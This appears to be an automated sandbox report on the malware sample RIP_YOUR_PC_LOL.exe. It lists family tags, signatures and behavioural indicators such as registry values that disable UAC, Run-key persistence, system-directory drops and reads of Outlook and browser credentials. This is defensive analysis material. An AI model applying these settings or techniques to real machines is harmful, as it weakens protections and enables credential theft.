Malware Analysis Report

2025-01-02 13:35

Sample ID 241204-xxpd2sslem
Target RIP_YOUR_PC_LOL.exe
SHA256 37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Tags
blackmoon nanocore njrat asyncrat azorult dcrat fickerstealer gh0strat hawkeye oski pony purplefox raccoon redline xmrig 5781468cedb3a203003fdf1f12e72fe98d6f1c0f @zhilsholi default banker collection credential_access defense_evasion discovery evasion infostealer keylogger miner persistence privilege_escalation rat rootkit spyware stealer trojan upx mediaget
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a

Threat Level: Known bad

The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.

Malicious Activity Summary


Dcrat family

Purplefox family

AsyncRat

Azorult

Fickerstealer family

NanoCore

Raccoon

njRAT/Bladabindi

Process spawned unexpected child process

Blackmoon family

Azorult family

Raccoon Stealer V1 payload

DcRat

Raccoon family

Redline family

Gh0strat family

Pony family

HawkEye

UAC bypass

Fickerstealer

PurpleFox

Detect Blackmoon payload

xmrig

Njrat family

Hawkeye family

Asyncrat family

Gh0strat

Pony,Fareit

Xmrig family

RedLine

Oski family

Gh0st RAT payload

Nanocore family

Oski

Blackmoon, KrBanker

Detect PurpleFox Rootkit

Detected Nirsoft tools

Async RAT payload

NirSoft WebBrowserPassView

NirSoft MailPassView

XMRig Miner payload

DCRat payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies Windows Firewall

Drops file in Drivers directory

Sets service image path in registry

Downloads MZ/PE file

Server Software Component: Terminal Services DLL

Uses the VBS compiler for execution

Executes dropped EXE

Reads data files stored by FTP clients

Checks BIOS information in registry

Impair Defenses: Safe Mode Boot

Checks computer location settings

Loads dropped DLL

Drops startup file

Unexpected DNS network traffic destination

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Indicator Removal: File Deletion

Enumerates connected drives

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Accesses Microsoft Outlook accounts

Checks installed software on the system

Adds Run key to start application

Checks system information in the registry

Suspicious use of SetThreadContext

UPX packed file

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Suspicious behavior: LoadsDriver

System policy modification

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

NTFS ADS

Enumerates system info in registry

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

outlook_win_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Runs ping.exe

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-04 19:14

Signatures

Blackmoon family

blackmoon

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A

Nanocore family

nanocore

Njrat family

njrat

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 19:14

Reported

2024-12-04 19:16

Platform

win7-20240903-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Azorult

trojan infostealer azorult

Azorult family

azorult

Blackmoon family

blackmoon

Blackmoon, KrBanker

trojan banker blackmoon

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Detect Blackmoon payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Fickerstealer

infostealer fickerstealer

Fickerstealer family

fickerstealer

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

HawkEye

keylogger trojan stealer spyware hawkeye

Hawkeye family

hawkeye

NanoCore

keylogger trojan stealer spyware nanocore

Nanocore family

nanocore

Njrat family

njrat

Oski

infostealer oski

Oski family

oski

Pony family

pony

Pony,Fareit

rat spyware stealer pony

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

Redline family

redline

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\ProgramData\Start Menu\dllhost.exe N/A

Xmrig family

xmrig

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\a.exe N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\QAssist.sys C:\Windows\SysWOW64\TXPlatforn.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259437400.txt" C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" C:\Windows\SysWOW64\TXPlatforn.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\a.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\test.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Opus.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\HD____11.19.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\ProgramData\Start Menu\dllhost.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\Cursors\WUDFhosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\healastounding.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A
N/A N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\gay.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe N/A
N/A N/A C:\Windows\Help\Winlogon.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\svchost.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Roaming\aaa.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TXPlatforn = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\TXPlatforn.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Documents and Settings\\taskhost.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Pluto Panel.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ISS Host = "C:\\Program Files (x86)\\ISS Host\\isshost.exe" C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Uninstall Information\\sppsvc.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\System32\\KBDVNTC\\lsass.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0fd7de5367376231a788872005d7ed4f = "\"C:\\Program Files\\Windows Portable Devices\\0fd7de5367376231a788872005d7ed4f.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a = "\"C:\\Users\\Admin\\AppData\\Roaming\\8f1c8b40c7be588389a8d382040b23bb\\a.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ProgramData\\Start Menu\\dllhost.exe\"" C:\Users\Admin\AppData\Roaming\3.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\ProgramData\Start Menu\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\a.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Opus.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\ProgramData\Start Menu\dllhost.exe N/A

Indicator Removal: File Deletion

defense_evasion

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Windows\SysWOW64\259437400.txt C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\SysWOW64\TXPlatforn.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\ini.ini C:\Users\Admin\AppData\Local\Temp\svchos.exe N/A
File created C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File opened for modification C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\System32\KBDVNTC\lsass.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Windows\System32\KBDVNTC\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9 C:\Users\Admin\AppData\Roaming\3.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\ISS Host\isshost.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Uninstall Information\sppsvc.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Uninstall Information\0a1fd5f707cd16ea89afd3d6db52b2da58214a6c C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files (x86)\ISS Host\isshost.exe C:\Users\Admin\AppData\Roaming\Opus.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe C:\Users\Admin\AppData\Roaming\___11.19.exe N/A
File created C:\Program Files\Windows Portable Devices\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\3.exe N/A
File created C:\Program Files\Windows Portable Devices\81a075a9bdba30e81d300eb5cd970ab17cef3e5f C:\Users\Admin\AppData\Roaming\3.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Cursors\TrustedInsteller.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render_New.dll C:\Windows\SysWOW64\svchost.exe N/A
File created C:\Windows\Help\Winlogon.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Help\active_desktop_render.dll C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\WUDFhosts.exe C:\Users\Admin\AppData\Roaming\22.exe N/A
File created C:\Windows\Cursors\KillProcc.sys C:\Users\Admin\AppData\Roaming\22.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Help\Winlogon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
